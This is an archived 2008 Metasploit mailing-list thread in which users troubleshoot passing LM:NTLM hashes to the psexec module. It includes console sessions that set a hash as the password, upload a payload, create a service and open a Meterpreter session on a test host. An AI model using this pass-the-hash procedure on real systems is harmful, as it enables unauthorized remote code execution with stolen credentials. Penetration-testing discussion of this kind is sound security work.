Metasploit mailing list archives
Using LM and NTLM Hashes with Metasploit's psexec
From: grutz at jingojango.net (Kurt Grutzmacher)
Date: Sat, 12 Apr 2008 09:24:54 -0700
The format is LM:NTLM and the only way the library knows is by looking for two 32-byte characters separated with a colon. What was the source of the hashes? Any pass-the-hash technique must have the direct PW->Hash result, anything that has been encrypted further with a nonce won't work. Also, NTLMv2 is not yet supported so your target must negotiate to NTLMv1. I just tried it against a Win2K3 server green install without a problem: msf exploit(psexec) > set SMBPass 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C SMBPass => 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C msf exploit(psexec) > exploit [*] Started bind handler [*] Connecting to the server... [*] Authenticating as user 'Administrator'... [*] Uploading payload... [*] Created \tCmiQnDv.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:10.1.1.183[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:10.1.1.183[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (iQjTupTr - "MniZYWPVdyZvaRRSNZZIGe")... [*] Closing service handle... [*] Opening service... [*] You *MUST* manually remove the service: (iQjTupTr - "MniZYWPVdyZvaRRSNZZIGe") [*] You *MUST* manually delete the service file: %SYSTEMROOT%\tCmiQnDv.exe [*] Starting the service... [*] Transmitting intermediate stager for over-sized stage...(89 bytes) [*] Sending stage (2834 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (81931 bytes)... [*] Upload completed. [*] Error: no response from dcerpc service [*] Meterpreter session 1 opened (10.1.1.55:38241 -> 10.1.1.183:5555) msf exploit(psexec) > Kurt On Fri, Apr 11, 2008 at 8:21 PM, Mathew Brown <mathewbrown at fastmail.fm> wrote:
Hi HD, Thank you for your reply, but I can't seem to get it to work. Also, where would I get the NTLM response from? I currently have the LM and NTLM hashes, not responses. I tried setting it to the LM:NTLM hash but it failed. I then tried it with just the NTLM hash and it also failed. Finally, I tried it in the :NTLM: format and it failed. Here's an example of what it tells me (the hash isn't really important since it's a test machine): msf exploit(psexec) > set SMBPass ::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1::: SMBPass => ::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1::: msf exploit(psexec) > exploit [*] Started reverse handler [*] Connecting to the server... [*] Authenticating as user 'Administrator'... [-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0) msf exploit(psexec) > set SMBPass b9d2d4957b330b503cc792eb6a55bb1 SMBPass => b9d2d4957b330b503cc792eb6a55bb1 msf exploit(psexec) > exploit [*] Started reverse handler [*] Connecting to the server... [*] Authenticating as user 'Administrator'... [-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0) msf exploit(psexec) > set SMBPass :b9d2d4957b330b503cc792eb6a55bb1f: msf exploit(psexec) > exploit [*] Started reverse handler [*] Connecting to the server... [*] Authenticating as user 'Administrator'... [-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0) Also, how would psexec differentiate between you sending it an NTLM hash to use for authentication and you sending it a password? In the example above, what if my password was b9d2d4957b330b503cc792eb6a55bb1f? How would psexec know that this was an NTLM hash and not a password? Any ideas? Thanks for your help. PS. I'm currently running Metasploit v3.1. After the failed attempts above, I verified that psexec works fine when I provide it with the real password and not the LM or NTLM hashes.On Friday 11 April 2008, H D Moore wrote: I think you can just set SMBPass to the NTLM response and call it done (thanks grutz!). -HD On Friday 11 April 2008, Mathew Brown wrote:Hi, After running info windows/smb/psexec in metasploit, it tells me: "This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload." I currently have the LM and NTLM hashes for a valid account on a remote machine but not the actual password. How would I pass this information to the SMBPass variable. Should I just put it as LM:HASH? Thanks. -- Mathew Brown mathewbrown at fastmail.fm-- Mathew Brown mathewbrown at fastmail.fm -- http://www.fastmail.fm - The professional email service _______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20080412/c5a73311/attachment.htm>
Current thread:
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 11)
- Using LM and NTLM Hashes with Metasploit's psexec H D Moore (Apr 11)
- <Possible follow-ups>
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 11)
- Using LM and NTLM Hashes with Metasploit's psexec Kurt Grutzmacher (Apr 12)
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 12)
- Using LM and NTLM Hashes with Metasploit's psexec Kurt Grutzmacher (Apr 12)
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 13)
- Using LM and NTLM Hashes with Metasploit's psexec Kurt Grutzmacher (Apr 12)